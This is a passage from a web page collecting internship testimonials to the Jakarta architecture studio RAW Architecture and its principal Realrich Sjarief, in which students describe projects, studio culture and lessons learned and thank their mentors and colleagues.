Therefore, I am also thankful to Kak Rich, for bringing up questions that we were all afraid to ask ourselves. 4 months had passed so quickly. For all the knowledge, experience, wisdom, laughter and memories, I thank everyone. No words can’t describe how grateful I am to spend the last 4 months in this new home. Thank You Kak Rich for being such a humble person and for creating a supportive environment in RAW, Thank You everyone for welcoming me into RAW with a warm smile, I hope to see you all again!

Best Regards,

Angel Gabriella Kusuma

Evanjelicel Tamio – Universitas Pelita Harapan

Firstly, I really want to take a part and give my best strength to the amazing team and architecture that RAW’s built. Personally I am amazed and have studied some of RAW’s works through books, online publications and social media, especially when I visited and directly enjoyed The Guild and Alfa Omega schools. For me, studying architecture is about curiosity and questions, of course this is very fun and challenging, but it’s time for that challenge to no longer come from something fictitious like a problem in the studio. This thought arose because I felt that I really did not understand the world of architecture when working in the field directly. from there I realized that architecture must be learned from it’s experts; I want to get the right place and mentor to improve the quality and professionalism of myself and the architecture that I will build in the future. And I believe that RAW architecture will give me just that and more experiences that I never expected before.

Gabriela Marcelina – Universitas Kristen Petra

Hello! My name is Gabriela Marcelina, but everyone usually calls me Gaby. I’m in the seventh semester of my architecture studies at Petra Christian University. I come from Surabaya, and from birth to age 21 always “played” not far from Surabaya. In the middle of 2021, I, who had become interested in architecture, decided to step outside of my comfort zone to explore and learn more about architecture by doing an internship at RAW architecture. Long story short, when I first started studying architecture, I didn’t really understand what architecture was, “What did I learn? What brought me here?”.

Until, finally, in the 3rd semester, I began to gain a better understanding of what architecture is and why architects are needed. I recall it vividly. It was the start of the 3rd semester, and we were given a task to design a multi-mass restaurant. At the time, my thought was, “Well, it’s gonna be fun; I can design a restaurant however I want.” But, over time, throughout the tutoring process, I was taught that it is essential to design a building that is not only of our own volition (the designer) but also one that can “please” its residents or visitors. Later, I was asked by my tutor to do a personal analysis of the human programmatic study, which at that time I did not understand the purposes, “what for? There’s already on Neufert’s book.” Until as time goes by, and when I entered the designing process, I just understood the purpose of my tutor telling me to do programmatic analysis, which helped me realize that I can’t only make visually beautiful buildings. But, it is also necessary to create buildings that can make the residents or visitors feel comfortable and safe by studying their behavior.

Through the knowledge that I got, I am very grateful because it has helped me become a more critical, detailed person who thinks holistically, both in the design process during studio projects in school or in competition, and in daily life. Also through lessons during my studies in school about behavioral, biophilic, and sustainability, I become concerned and interested in people, nature, space, existence, and the future. Since there are many processes that I go through while studying architecture in school, I become more “hungry” for architectural knowledge that occurs in real life. “What does the real-life architecture look like?”. This question has been in my head a lot since I was in school. Therefore, to answer the curiosity that has been suppressed for too long, I finally got up the courage and decided to go through the internship at RAW Architecture.

One of the best decisions I’ve ever made was to apply for an internship at RAW Architecture. I’d like to express my gratitude for giving me the opportunity to join the RAW Architecture family. When it comes to applying to RAW, one of my main goals is to learn. Until, finally, during my internship, what I learned about architecture in RAW far exceeded my expectations. I was very guided in learning about real-life architecture in RAW. Every time I get a new assignment, I am very delighted because every time I completed the task, I gain a lot of insight and knowledge that at first appears to be very unfamiliar to my ear. Every day in the studio, I will definitely hear, understand, and learn new vocabulary about architecture and drawing techniques that I have never known before. Aside from learning about architecture through RAW, I also often get insights about life, which help me to develop and grow into a better person.

Through this testimony, I would also like to thank:

1. Kak Rich is always willing to share his knowledge and insights with others. For example, Kak Rich always gives us much insight about hard skills or soft skill tips related to the studio project every Monday meeting. He also always encourages us to learn writing, and one time he’s willing to teach us about communication skills despite his busy schedule. Also thanks to the presence of Kak Rich, who is always humble and appreciates both the small and big things, the studio environment becomes very friendly, cool, and fun.

2. Kak Timbul, Kak Vivi, Kak Alim, Kak Rico, Kak Riyan, Kak Pandu, Kak Tyo, Kak Haykal, Kak Vyan, Kak Khafid, Kak Mei-Mei, and Kak Fina, who have always been willing to take time out of their busy schedules to teach me about architecture, software, as well as life lessons and many more. Thank you for always sharing with me life insights, always being happy to answer every question that I had about my studies in school when I was confused, always making me laugh with their hilarious jokes, always giving valuable advice, and never making me feel left out.

3. My internship friends, Celine, Neilson, and Kak Ubi, who are always willing to help and teach me whenever I’m unsure and confused about something and are very fun to talk to.

4. The other members of RAW Architecture, are always friendly to me and never make me feel excluded while in RAW.

Lastly, I’m extremely happy and grateful to be a part of the RAW Architecture family. Even though I am currently far away from my family, I feel very happy to have a new family in Jakarta who is willing to accept me, guide me from zero, and always wholeheartedly give me a bunch of knowledge. Surely, all of my experiences and memories in RAW architecture will definitely be remembered fondly in my heart. RAW architecture is indeed the best office ever! ^^

Gaby’s Birthday

I graduated from DIII Midwifery in 2016, then continued my education for the undergraduate level of Hospital Management at Esa Unggul University. I graduated in 2019, and My work experience and internships were in several hospitals, health centers, independent clinics, and midwives. I like a lot of things and want to learn wherever it is because, in my opinion, learning is not only focused on one goal or one major that we are studying. I am learning can be taken from many sides. That’s why this is one of the reasons I was able to join here to be a part of this family. It started from what I had not been able to do until now. One step ahead, I have learned what the intent and purpose of what I do is. I hope that with me joining the team here, I can be one of the best among the good.

With my experience of working for almost five years, I am pretty proud of what I can do and learn here because, for some people, it is not easy to want to learn again from scratch. Still, I chose to be able to learn again from the beginning starting from the very beginning. I did not understand anything until finally here I could understand and learn a lot of things. Work and Play is my motivation. It means I can work while playing and complete the job properly and correctly according to what a boss wants. I hope that what is already in here can always be adequately maintained and further appropriately developed to become better individuals in the future. If there are still things that are not good, let’s learn together to improve. I am pleased because I can be a part of this RAW Architecture.

Eubisius Vercelli Ocvanto Kuncoro – Universitas Pelita Harapan

Joscelind Vallen Kawengian – Universitas Kristen Petra

Biografi

Testimonial 2

Dheavindra Fara Ayesha

First of all, I would like to say thank you to Mr. Realrich Sjarief as well as RAW Architecture team for the opportunity to do internship for 5 months starting February – June 2021. It’s such an honor to be able to learn and directly experience the architectural work in real life, as a complement to what I’ve learned during architecture school.
.

I spent one whole year at home attending online class and doing endless
assignments. That is to say, I would never forget the day I first started to go outside on a daily basis to do my internship like I did for the past 5 months. My first day I went to Guha was an unforgettable experience. I experienced firsthand the infamous work of RAW Architecture and I can’t stop being in awe. Little did I know, though, the admiration to the works of RAW Architecture never stops on the first day. It continues on to the very last day.

.
Here, I came with very little knowledge about architecture. But eventually I learned that at RAW, questions are encouraged, and soon enough I will learn a lot more about architecture. Truthfully, I feel like my 5 months internship at RAW Architecture has taught me more than my 5 semester in architecture school. It shown how impactful it is to learn firsthand and on site. As a result, I learned a lot of things that cannot be obtained anywhere else. I believe my experience during this
internship period has taught me a very specific skill set that only RAW Architecture can provide. I achieved a lot of technical skills to improve my workflow using the software I’ve used before. But most importantly, I learned how to actively work on the task by asking questions, for example. Which was, again, very encouraged here. I also learned how to work effectively and systematically, which I directly learned from Realrich Sjarief himself. He taught me mistakes can be made, however there are a lot of things that can be done to prevent these mistakes from happening, which is to do work within a set of systems and sticking to it. Lastly, I would like to thank the RAW Architecture team once again for the opportunity to learn and improve throughout my internship period. There is always a room for improvement, as reflected in a never-ending improvement of Guha. I hope we won’t stop getting better after saying goodbye.

To Kak Realrich Sjarief and RAW Team

Time flies so fast. I just finished my internship program at RAW Architecture for 17 meaningful weeks. My internship experience started on 18th December 2020 when I saw RAW Architecture open an internship program. I am so thankful that RAW Architecture gave me opportunity to learn so many things as an architect. My first impression of RAW Architecture is little bit shocking because the work culture is so crazy. Everyone is working so fast and go home late at night. I thought that I can’t keep up with RAW’s working pace. In the end, I managed to through all the obstacles because everyone in the studio was so kind to help.

Before I work at RAW Architecture, I thought that architecture is only about conceptual design. After I work at RAW Architecture, I realized that architecture is a knowledge that so comprehensive. I learned so many things, not just how to design but all the details including communication skill toward clients.

My first project at RAW Architecture is Danau Biru Compound. I can’t forget the knowledge that Kak Realrich gave me about the existing house of Danau Biru. The spaces and the details of House at Danau Biru is so breathtaking. Danau Biru Compound is the only project that RAW Team gave me a task to make model. Although the model is not detail, I still learned the principle how to make model for client presentation.

The project that I involved a lot is House of Tjandra at Puri Botanical. I learned so many aspects in this project, not just the interior design principle but also the details that make the space is unique. One of my favorite moments is when I got the chance to design the swimming pool area. I was so surprised that Kak Realrich told me to refer to Carlo Scarpa’s Design for designing the swimming pool stair. Before I got this assignment, I thought that all swimming pool stair design is template but RAW Team taught me differently. Even is just a stair, we need to elevate the standard so that we can achieve a remarkable design.

To Conclude, I want to thank to Kak Realrich for letting me in this awesome office and also all of the associates and designer, Kak Ali, Kak Dini, Kak Riyan Kak Pandu, Kak Alvyan, Kak Thomas, Kak Timbul, Kak Vivi, Kak Erick, Kak Meimei, Kak Riko, Kak Khaffyd, Kak Fina, Kak Icha and Kak Alim for all the knowledge that I got. And last but not the least, the interns, Kak Icang, Caca, Avie, Joshi and Nielson for all the fun moments that we spend together. Thank you very much RAW, I wish you all the best.Best Regards,

Panji Diwya Ugranindito

RAW was the first architectural firm I knew and visited as architecture students. 2017, Kak Rio Sanjaya, my first studio assistant, took me on a small tour of the Guild, which was still under construction at that time. During the tour, I said in my heart, “I want to be here again.”

December 2020, the first time I saw an announcement of an internship programme at RAW, I was suddenly interested. After going through long and difficult thoughts, lots of considerations, especially we are still in this pandemic situation and I am in the last semester with final project, finally decided to try and got the opportunity. I feel very grateful, feel lucky and very happy.

Still remember exactly the first day, everyone was very welcoming, friendly and warm. For me, to be honest at first it was not easy to adapt. Moreover, still have online class to do and deadlines in college. Fortunately, colleagues at RAW are understanding and guide me very well. Every day, there are always new things that I learn. Starting from the way of thinking, designing, technical, programming, structure, working fast, and knowledge about architecture itself.

There are so many things that I got. From Mr. Realrich, I learned about the importance of discussion between colleagues, always listens to others including the interns. He reminds us to work neatly and structural. From him I learn that every design has a story, I learn details and technicalities, when we have to run and when we have to relax for a moment,  how to think as an architect, and always be humble. It’s amazing, the figure of Mr. Realrich who is always surrounded by a lot of jobs, but still can manage it well and always passionate. And another thing that I admire, Mr. Realrich is always concerned about our health and appreciates all our work. So many new things that I have never got, and I just got here. Every day, I realized that there were still many things that actually I didn’t know.

Every day is a memorable day for me. Starting from visiting projects where I learned a lot about the build process, the workers who always cheerfully but still work profesionally, lunch and dinner together, sharing and joking, until the last day of my internship.

After my internship at RAW, I became aware that I was easily stressed out at work, panicked, sometimes rushed, less thorough and less tidy at work. So, after my internship from here, I learned to work more calmly, neatly, structured, more thorough and detailed.

Thank you very much, first to Mr. Realrich for the opportunity, to Mas Ali, Kak Thomas, Kak Ryan, Kak Pandu, Kak Timbul, Kak Rico, Kak Kaffyd for guiding and helping me when I was having trouble. Also to all RAW workers who welcomed and received me well. And finally to fellow interns, Panji, Mas Icang, Avi, Joshie, Nielson who most often sharing and help each other at work.

It is still hard to believe that I have completed 3 months of internship at the RAW office, a well-known studio with a lot of accomplishments. I will never forget those 88 memorable days in my life.

Best Regards,

Editha Santika

Time is up. Ding Dong.

To Mr. Realrich Sjarief and RAW Team

My time has come. Time to farewell to everybody I met in RAW Headquarter. Time to farewell with every pieces of memories in almost 3 Months I got in there. Farewell is doesn’t mean to forget about it, but I have to grateful for the Experience, Knowledge, Opportunity, and Time as long as I was there. Let me excerpt some wise words “You can buy anything in this world, but you can’t buy time” This is really Has a deep meaning to me, because for How much amount of money you can spend, how rich you are, Time is Everything that no one wouldn’t change it.

My debut starts in Research and Development Division to create a model of some RAW Project using the Technology called Laser Cut. Sounds normal if using that machine to make a model, but how if you operate the machine, create all of the part by your own hand. In my opinion, it was a really exciting because you got an experience maybe you’ve never got before, how does the machine works, and also from making then model, I got a Scale of Space, Soul of Space, tectonically in Raw Material, The Fineness of Architectural Detail, etc which I didn’t really mind to it before. Patient is really needed to kind of job like this, and it give me a positive effect for my personality, make me do more precisely in every single details. These things stimulate me to be ready involve in next project.

Furthermore, I was able to be a part of one office space project team I spent the most. Some were had a high level of difficulties and complexities by intense discussion among Mr. Realrich Sjarief – Owner, Mr. Realrich Sjarief to us. I saw a never ending process of exploring, developing, adjusting the design until only we create the limit for that. Creating a limit isn’t we’re already satisfied, but we create it because of we think we’re already push the limit for them. From that case, I learnt not to discover something until you can’t handle it as well, it will make you lost in somewhere you don’t understand anymore. From the beginning you have to know when it time to stop and it is useful also to know yourself deeply, why you have to stop for it. Sometimes get back in a moment can be better for yourself, it can recharge your mind, energy, spirit to continue it again rapidly.

Mr. Realrich Sjarief had ever been told us about Trimurti, consist the triple deity of supreme divinity in Hinduism in which the function of creation, maintenance, and destruction. He can correlate them in Architectural way, for instance, in this modern world, our universe got the impact of environmental damage from our ego in order to build prestige development. we didn’t conscious, what we did before affect our society. As an Architect we should be aware because if we greedy over pride, we also can be the destructor for our Natural Environment. What I’ve talking about is pictured in Alpha Omega School by RAW Architecture

In contrary, I’m amazed the RAW slogan “Architecture Mastery in Natural State” firstly, I tried to interpret what the significance is? After in RAW, I think, I might define, RAW wants to create every project with in their pure value of design by empower the craftsmanship. Natural have a million of connotation, but when we know what is the purpose, we can found pattern to answer the natural state itself. If you haven’t found it, do not fell anxiety, calm down your mind by development of sensitivity and acceptance through relaxation of the body, feeling and mind which re-tell by Mr Realrich Sjarief in one day of annual Monday discussion. Many life value were taught to us and give a refreshment for the week and also give us what are the value which we can apply in studio culture.

RAW Architecture build an initiative, interactive, responsible, and good work ethics systems which can be a positive theory for all of the people work in RAW for whatever their division. It has a strong base as an Architectural Studio which pilot to another studio in Indonesia or other countries. OMAH Library as a part of RAW Architecture also influence and Inspiring young generation who learn Architecture, or other related major of knowledge to deepen their thinking by reading a book, making an interactive discussion to be more analytical in their thoughts to aim it can be implement in studio works.

On The Other Hand, I’m Thankful too for the special opportunity to be a part of RAW Architecture, Thus, I got a plenty of Knowledge by an Interactive Studio Learning Process through discussion that happened during my time in there. If I should describe it, RAW is a Unique, Interactive, Creative, Deep and Critical thinking into the Detail and keep in Natural State itself.

To Conclude, the chance to enhance my experience in RAW, I will never forget it, and I really impressed how strong the solidarity between each other to create a nice atmosphere in studio and keep the same as the tagline “Best Office in The World “

Best Regards,

I was determined to intern at RAW Architecture after I read about it. The process of application started off quite a few months back and I didn’t know if I would get the opportunity to work with their team. I was inspired by the work and ideologies of the firm and today I can’t believe that I came here and 8 weeks of my internship are already over.

I have had a wonderful experience interning at RAW. I was able to be part of different kinds of projects – residential and institutional. Some were delivered through models and some through technical drawings. The discussions in the studio with Mr. Realrich and fellow designers gave me an insight into how complex the system is- it starts with the design process of brainstorming and bringing out alternative ideas for the project, taking into consideration the site, client preferences till it finalises into a good design. Mr. Realrich says that the design process is the framework to the final product and requires to be stronger, requiring more time, thinking and the attention to detail. Not only that, each project has an underlying story and a philosophy that drives the project. I remember Mr. Realrich telling us about the Alpha Omega school and how it symbolises life and death which is very interesting because buildings impact lives of people and stand long enough to tell a story.

The philosophy classes at RAW introduced me to the ideas of some great philosophers which I did read about later. One cannot truly teach architecture. It is a skill that you develop through observation, experience and inspiration which is exactly what this class meant to me. It opened up ideas and made me think of things that I usually don’t.

Today, as an architecture student I can see that there is so much more the world of architecture has to offer. With so many emerging architects and advancing technology, it is difficult to catch up. It makes me anxious if I can survive in this field. But ‘Anxiety’ is what drives you to work more and more if you use it as your strength. I have always been in that condition since the time I joined architecture but it probably can get the best out of you as long as you are satisfied. Many of such Monday morning pep talks by Mr. Realrich have been energy boosters for all the days I have interned at RAW. He has been a great mentor and I am sure that his expertise will be an influencing factor in the works I will do in the future.

The studio environment and the RAW team has been very motivating and enthusiastic and I have a lot to take back from it. I would like to thank Mr. Realrich and the team for giving me the opportunity to experience this journey. It was a pleasure working with RAW and I wish them all the best for their future endeavours.

Christine Gunawan – Universitas Indonesia

My internship is purely based on my own interest and curiosity on how to transfer myself from university to professional world. From whether I have to go straight to pursue my masters, I want to work in small developing firm or corporates to I want to make my own firm kind of plan which are no doubt, several big milestones an architect wanna-be can think about. Lucky me, Mr Realrich and colleagues in this architecture workshop has gave me opportunity and introduced me warm-heartedly to experience eight weeks of office life, studio culture and work ethics. In regards, I would express my appreciation and thank you to Mr Realrich Sjarief, associates and many designers that were willing to work closely with me and thought me both technical and visionaries experience about architecture as profession.

Today, I have come to my last  day of my independent internship program at RAW. In the beginning of the internship, I have plenty of expectation I did took notes on. And let me tell you, it is not the common ones. For instance, involved in some urban scale projects, being able to create powerful detail drawing to be used in a project, having to know how to develop a design on paper into real-life structures on ground and dealing with clients.

Guess what, only 15% of these come to life. That 15 % was being able to touch a small part of the urban scale project – which is fair enough since those are infamous expectation points a 2 months intern could have. As a reflection, many of my expected points need some extra time to be learn throughout. Many others, they just need more experience, more opportunities and more definition of an own architectural language which have always been a true challenge any architect in progress. However, I did involved in many interesting projects with Mr Realrich and team that has taught me unexpectedly beyond my expectations both technically and non technically.

Back to my former curiosity statement, being in a state of progressing as a fresh grad, I’ve always wondering what is it that a normal architect should pursue after they graduate especially in my case – the rushing and extremely anxious human being. Without neglecting my own personality, moral and values, thoughtful lessons I have got in this studio has impact my thinking in an immense way. While the world is often against the believe of architecture and underestimate the sleepless night an architect has devoted on, Mr Realrich never spend a second doubt on his calling in this field. Presumably, there are distinctions I can help to breakdown between my state and Mr Realrich state.

After a while of internships, teaching and learning as well as talks with Mr. Realrich and friends I have learn a couple of new paradigm I think many of interns should be aware of during their transition life. First of all, an idea I got from Mr Realrich perspective is that, every architect in progress would certainly need their first 10 years in their field to explore, to know what they want, to move from many self-interest to another and to grow uncomfortably. It is the only time we could hardly spend on learning and deconstructing our ego as well as not to worry if we haven’t be settle in life.  Secondly,  is how to work professionally, meaning that even if we do small things we do it with our maximum effort with the a certain quality where it is enough to be seen by others and enough to respect our own master piece. Thirdly, is how to overcome a powerful anxiety – by balancing our life. It is important not to fully spend time in front of our workstation but to also have some leisure and tidying up our sanctuary. Last but not least, is not to doubt on our believe and what we have been started as a form of gratefulness to God and the universe. Therefore, it is okay to dream big, universe will open up ways when it is truly a dream that are made for you.

At last, I could not say enough of appreciation and thankfulness for this opportunity. Wishing Mr Realrich,  associates and team a best journey a head. I has been always a pleasure to be part of RAW impactful role in architecture.

Best Regards,

Christine Gunawan

Miftahurrahma Ridwan – Universitas Gadjah Mada

Hate to say, but I know this day will come. The day of my last internship program at RAW. It is crazy and wonderful to look back what I have done for almost eight weeks of my internship period. Starting from an empty glass that does not know how and what architecture world will look like and ends up picturing the world that will be embraced after my college period and lucky me Mr. Realrich and colleagues in this office has gave me opportunity and let me kind-heartedly to experience eight weeks of office life, work ethics and studio culture.

Flashback on my first day as an intern, I must have bunch of list the things that I want to learn about the world of architecture. It is start with designing a building and learning about concepting design, how to transform a form and until I reach how to designing an urban scale. Indeed, what could we expected from two short months and expecting that I could master all of that, right?.  But what the best I got is how the process of being someone who is great at conceptualizing design, the process of being someone who is great at transforming a design, and also someone who is great at things of curiosity.

As everybody said that we can’t eliminate the process from the meaning of successful. Once Mr. Realrich said the process is a phase of self maturation and from that phase we can learn how to be the best side of us.

Honestly, as a student who is still learning and still green in the world of architecture I do still get anxiety about world of architecture in forward. Sometimes it still feel not enough from the intense competition, sometimes I also fell my design is not strong enough to waken somebody or impressed somebody. But seeing Mr. Realrich and colleagues worked on a project made me realize that anxiety never left us. From all of the point, what all we need is how the anxiety can become one of the strengths and encourage us to do as much as possible and become the best version of our self.

Many things that Mr. Realrich and colleagues have done either realized or not have opened my architecture’s eyes in a right way. First of all, is a sincerity and determination. If you are being serious then do it until the end and even though there will be a small problem on way through of it which will make you bigger. Secondly is, how to control anxiety. Even though Mr. Realrich and Le Corbusier itself has anxiety and they success control it and become undoubted person. Thirdly is, a paradigm in seeing the architecture’s world. It is not only the title of job or work but make it to part of your life. Fourthly is, time management. Always try to have enough space to get relax from all the works. Fifthly is, be a professional person. This point I get when I working on the details of the building of a project or even when I was working on the model. Even the details of the detail must be considered and if we do a small thing we do it with a maximum effort. Sixthly is, Sumarah. This is really hit my heart when Mr. Realrich told us once. And indeed, of all of the work that has been done, we must give it up to the supranatural elements that we believe in. And sometime I think that sumarah is the highest stage of a job. When we reach the maximum of our work and let the spells  work on their own.

And still even at last statement of my paper, you guys not know how grateful I am being given this opportunity and feel this journey with all of you. I hope nothing but best for Mr. Realrich and colleagues in forward and always been pleasure to take this trip with RAW Architecture.

Thank you.

Best Regards,

Miftahurrahma Ridwan

1% to 99% . . .

For the first of all, I would say thank you to RAW team who take me become part of meeting member every monday at RAW for 4 month to discuss many project. I definitely have learned a lot here, thanks to everybody who was so helpful especially to associates who always not only just gave a lesson but fully motivation and designers to, always laughing and full of happiness everyday. This place breathed new perspective on so many things into my thought, not only on architecture but on creativity and management in the sense of design. I was so grateful, and still am, to be a part of RAW even for just a brief moment.

I would especially thank to kak Rich for sharing many knowledge. I’ve never met anyone so genuinely into educating people like him. Kak Rich thought me the point when you want to be a better person you must in good Precision, discipline, good attitude, always think hard and study everywhere you stand. I amazed to kak Rich for his honesty. I amazed because he has a high integrity in doing his job and he thought of everything from the smallest thing to the big thing, all about work of RAW Team from design process to build process and and he thought of all the workers. Besides it, Kak Rich is very concerned about each of his men in work and health. He always told to work at clean table.

Thank you RAW to given me opportunity to learn more about architecture here. I learned about the design process. I studied step by step in the design process. Revision by revision should always be undertaken without any discouragement. I learned to remain calm and focused even experiencing pressure and obstacles. I’m aware this process will make a better design. Andry house and family is one of many project I designed with RAW Team, this house with triangle skylight adoption from Church of Firminy by Le Corbusier, this house is amazing without of the box skylight at roof.

And finally, thank you for all internship friends, and all RAW team, thank you so much RAW Architecture for letting me to be a part of you for 4 months. Thankyou so much for your kind guidance on this valuable times that I would never forget. The best office in the world – R A W.

First I would like to thank full to Mr. Realrich permit I intern at RAW. 4 months time I think is a very short period of time in I draw knowledge in RAW because it all outside suspected i. because many interesting things and unique events in addition to the knowledge that I get.

Why did I choose internship ?, because I taste before completing study learning in campus, I feel that there is something different if i immediately slumps from the know more down or get work experience before completing the lecture. because many factor that convinced me to intern, in Campus itself only teaches even though there are some practice. In fact in the work obtained make the largest experience because many things outside the suspected i obtained. I see the world that work is not easy and not as envisaged. I know how the architect profession, see and experience of learning given by Mr. Rich, he figure that teaches we should be able to survive despite the harsh the flow of life, besides things that make I was impressed with the paper and the building that makes me know how we should be in designing. In addition how do we face the client and how to overcome all its problem field and solutions that I watch itself is not easy. And from there I take the lesson.

Where I draw the science named with castle bamboo where in the castle Bamboo itself there are many people that have a role in the survival of i learned, many older sister funny and exclamation point that guide me in 4 months. I also would like to thank associate, the designer and the employees who participate help me during in RAW. In addition to the knowledge and experience of many interesting things that I feel at bamboo how daily routines that they do make something fun and not make me bored. I will yearn for the atmosphere like this. So also some traditions as I feel included in the pool held if there are members or employees who repeatedly years. And there are many things unique and interesting again, the conclusion of all that I get in the RAW is something that is very valuable because it might not i will get outside there. From that I did not know what the world of work in the field of i until I know how the working world.

Thank you very much I say to associate kak Mifta, Kak Asep, Kak Ali, guiding me and apologize when there is something that is less acceptable for i in RAW and I thank kasi also for older sister designer Regi, Dini, Aga, Memey, Fiona, Nida, Gomes, Tirta, Laras, Icul, Irul, Khafid, Haris, Bangkit, and all the admin that friendly to me. Hopefully my experience in RAW become a stepping stone me to work harder in achieving my dream to become an architect. Always so best office in the World RAW.

My special thanks to Mr. Realrich, Assosiates and Designers for giving me best experience for 16 weeks in studio. 16 weeks is not a short time but it feels very faster with the atmosphere of the studio because too much fun and too far from the word of boring. This studio is not like the general studio in Jakarta, either in terms of long time in the studio or the atmosphere while in the studio. This studio is unique, you can start start at 8 am and will finish when all your targets are reached in that day. But I really impressed with Mr. Realrich’s team because all designers and assosiates very friendly for me, they are also able to melt the atmosphere when the atmosphere is a little hectic and of course they are very respect for each other. That’s what makes the time in the studio does not feel so long, we really enjoy with this atmosphere.

There are so many fun things I did with the team during in studio, from being a radio host with very strange and unique songs, playing music while bored, playing pingpong when coming home early, listen the joke of a friend in the studio and take a break in the next market to just take a rest and make some joke.

With the guidance of Mr. Realrich, associates and designers, WI can learn many things from the length of a designing process. 4 months I spent focusing on one unique project, from which I took a lot of lessons about how the quality of teamwork work can be very helpful to push all the existing targets. In the process of designing Mr. Realrich also always taught for team 1. Big or small the project, everything should be based on existing data and standards. 2. Always detail even the smallest things, because of the small details that will be give a big impact. 3. Never lose your arguments from what you have told and the sources you get, 4. Always want to learn again and again, by reading books and writing, 5. Have a good communication and one thinking with the team. 6. Responsibility on the team of course.

For me, Mr. Realrich is not just a great architect, more than that he is a great inspirator to never give up on my dreams, and help convince me to be brave again to look at the future. Mr. Realrich is also a figure I can say as a “role model”, a leader who cares about the team, very totality to the every details, and always want to push us to get even better in the future.

Therefore, I am very grateful to have a great mentors, a good friends and was once part of the RAW family. Thank you so much for all guidance in this very limited time. I will never forget this experience, I’ll see you on top guys.

Gregorius Jasson – Tarumanagara University

Jakarta, 12 April 2018.

Dear Mr. Sjarief,
It’s been 2 months since I finished my internship programme at RAW Studio. From my sincere heart, I’m very thankful for you and rest of team to give me such opportunity in experiencing direct practice as professional architect.

Many new knowledge and insights I got during the programme period. I learnt that architectural drawings still had to be updated, even the projects were already done, as necessary for further owner’s civil administrations and auditing process on company works. Routine documentation process on site is also important to maintain the projects quality control and provides back-up project data for emergency causes.

I also learnt about one important thing in architectural practice: Trust. The way to maintaining trust with other co-workers in organizing and developing projects through intensive discussions and reviews. The trust which constantly exchanged between design, finance, and builder divisions in order to keep construction process on site properly executed as plans. The same trust that also came from owners toward project development which I believe it couldn’t be well-executed without their feedback. From these things I can conclude if architecture works, no matter how it looks amazing or innovative, won’t be meaningful if we couldn’t keep trust in every aspects of its process.

While I’m working in here, I was very enjoying the workplace ambience and your teamwork were really helpful and supportive to me. Only the studio office hours could be set more early, since I took a long route to go and back from office to my home at Harmoni, Central Jakarta.

Aside from it all, I’m very grateful to experiencing these things with RAW team. This internship programme has giving me more determination to become a capable architect, not only in technical skill or theoretical thoughts but also on keeping up relationship with project partners.
Thank you for your consideration and kindness to let me join your studio. I’m also apologize if I unconsciously made mistakes while working on your projects. I hope we could meet again and working together as one team in the future. Once again, thank you very much.

Best regards,
Jasson.

I write this letter based on my experience during internship in RAW. My big thanks to Mr. Realrich Sjarief and RAW team.

2 months – It’s not a long time. But what I got during the 2 months of internship in this office far exceeded all my expectaions. The two months I’ve been through are short-lived, but the experience I get is so much and worth it.

Through the RAW team, I learned about the design process. Apparently what has been learned in the world of college is nothing compared to in the world of work. I studied step by step in the design process. Revision by revision should always be undertaken without any discouragement. I learned to remain calm and focused even experiencing pressure and obstacles. I’m aware that this would shaping me up to be better.

I amazed at Mr.Realrich for his honesty. I amazed because he has a high integrity in doing his job. I amazed when I see he prefer to let go of profit for the sake of working cleanly. Besides, Mr. Realrich is very concerned about each of his men in work and health. He always gives us education through work so that every day we can get better.

I once again salute to each RAW team for their efforts, and I learn a lot from it. During this internship, I realized that the main reason RAW can be as good as it is today is not because there are super great and legendary people inside. I realize RAW can succeed because it contains people who are always trying, people who struggle furiously when they have set a goal in its work. Whether it works or not, wether succeed of fail, I really like people like this. I wish I could be like them, striving hard to achieve my life’s desires and goals.

The apprentice 2 months have passed. But my journey in architecture doesn’t stop here. Thank you for the lessons for 2 months, now I will try hard and give my best to be better.

Thank you RAW for everything.
Sincerely,

Yoseph Duna

“A Family” – More than a Office

I never thought my first working experience as an intern would be turnrd out so overwhelming. In memory of 14 weeks, my intern life as a part of ‘RAW’ family,is unforgettable.

6 September 2017 was the first day of working experience with the “Dream Team”. I still remember how everyone cordially welcome me & make myself as a part of ‘RAW’ family on the very first day though I was a foreigner for them.

Besides, if I describe about my working experience I would say the ‘RAW’ people helped me a lot to give the best performance out of myself. Starting from hardcore dedication for work to enjoy every bit of it,I learned all of them from ‘RAW’. They always had given the exposure to improve my concept generation, sketches, fenestration study, plan developing,3D,model making on several projects. Besides, if I describe about my working experience I would say the ‘RAW’ people helped me a lot to give the best performance of myself. Starting from hardcore dedication for work to enjoy every bit of it,I learned all of them from ‘RAW’. They always had given the exposure to improve my concept generation, sketches, fenestration study, plan developing,3D,model making on several projects.Within this 3 Months I developed my technical skills a lot. My computer skills just got better in every other day.

Furthermore Mr. Realrich inspired and suggested me to learn a new software  before I have returned to my country. it’s surprising that just in 20days I learned lot about computer and abled to finish two projects drawing using this software. It wouldn’t have been possible for me to learn this in a very short time without the help of all the architects and specially Mr.Erik. I can’t thank enough all the architects to teach all the small techniques and commands. Along with that Site visits from office to few projects also enriched my knowledge about construction details, understanding drawings, site working environment and a lot of things.

On the other hand, the office environment was never like only doing works. It never gave me the chance to get bored. It was always a delightful, fun loving environment not only for me but also for the others intern. Moreover the working environment was very friendly. I have always found the spark of work, fun within it,comfort zone and a supportive vibe while working.

I am very glad that I got a boss like Mr. Realrich who always cherished and inspired my work. In a meeting of one Monday he said, ‘ I don’t treat Trina as an intern, I treat her as a designer of here’. I can’t express how much this words motivated me to the next level. He is a kind of person who never acted like a typical boss rather he chose to be a great advisor. I would say it is the rare virtue and capability of him and his ‘Dream Team’. My words will be less if I start thanking and describing about Septrio,Ali,Miftah,Nida,Icha,Gomes,Regi,Yuli,Tirta,Aga,Bangkit and the other members of ‘RAW’. I am blessed that I met this people who were beside me starting from facing difficulties in works to making me comfortable while feeling homesick.

Last but not least, the learnings, the motivation and the support and love I have taken from ‘RAW’ will always enlighten and cherish my working diary of Indonesia.

This is the ‘ Best Office in the World’ indeed.

Ishani Dayal – SMVDU

So, finally the last day has arrived.

I didn’t ever think that these 4 months would vanish off as if anything!

I’m very delighted, getting an opportunity to work in RAW Architecture as an intern. This is my the very first experience of working, that too outside my country and it has been the “perfect” one!

During my time in RAW, I am gained skills that are not accommodated by institution, but in the real industries, what we understood as an architect student is, completing all the design process and producing such killer visuals. However, the real industries say, completing them, is just the very first process of completion.

